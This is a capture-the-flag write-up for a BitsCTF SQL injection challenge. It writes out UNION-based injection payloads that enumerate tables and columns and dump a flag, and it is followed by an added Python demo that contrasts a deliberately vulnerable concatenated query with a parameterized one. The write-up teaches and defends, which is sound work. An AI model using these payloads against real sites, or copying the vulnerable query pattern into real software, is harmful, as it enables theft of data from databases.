[BITSCTF]Batman vs Joker[WEB][30pts]

This challenge is from BitsCTF:

This is a SQL injection. Let’s find the number of columns by entering “' union select 1,…” until it doesn’t throw an error; the number of columns is 2:

Then we need to find the names of the tables with this query:

' union select table_name,2 from information_schema.columns -- - 

This retrieves the names of the tables in the database. The “Joker” table seems interesting, so let’s list the columns of that table:

' union select column_name,2 from information_schema.columns where table_name = 'Joker' -- -

 

Let’s dump the table to print the value of the “Flag” column:

' union select flag,HaHaHa from Joker -- -

The flag is: BITSCTF{wh4t_d03snt k1ll y0u, s1mply m4k3s y0u str4ng3r!}
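Added example, not part of the original write-up or the challenge's code: the same payloads run against a string-concatenated query and against a parameterized one, to show why the injection works and what removes it. The SQLite database, the heroes table, the function names and the placeholder flag value are assumptions constructed for illustration; the challenge's real backend and schema are not shown on the page.

```python
import sqlite3

# Final payload from the write-up above.
PAYLOAD = "' union select flag,HaHaHa from Joker -- -"

def build_db():
    """Constructed stand-in database; the challenge's real schema is not shown."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE heroes (name TEXT, city TEXT);        -- hypothetical table
        INSERT INTO heroes VALUES ('Batman', 'Gotham');
        CREATE TABLE Joker (flag TEXT, HaHaHa TEXT);
        INSERT INTO Joker VALUES ('PLACEHOLDER_FLAG', 'ha');
    """)
    return db

def lookup_vulnerable(db, name):
    # Input is pasted into the SQL text: a quote in `name` closes the string
    # literal and everything after it is parsed as SQL.
    sql = "SELECT name, city FROM heroes WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, name):
    # Input is bound as a value and is never parsed as SQL.
    return db.execute(
        "SELECT name, city FROM heroes WHERE name = ?", (name,)
    ).fetchall()

def raises_sql_error(lookup, db, name):
    """True if the lookup fails with a database error for this input."""
    try:
        lookup(db, name)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = build_db()
    for probe in ("' union select 1 -- -", "' union select 1,2 -- -", PAYLOAD):
        for fn in (lookup_vulnerable, lookup_parameterized):
            try:
                print(fn.__name__, repr(probe), fn(db, probe))
            except sqlite3.Error as exc:
                print(fn.__name__, repr(probe), "error:", exc)
```

With the concatenated query, the one-column probe fails with a column-count error and the two-column probe succeeds, which is the behaviour the write-up uses to count columns. With the parameterized query, every probe is compared as a plain string, so there is no error and no extra row.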
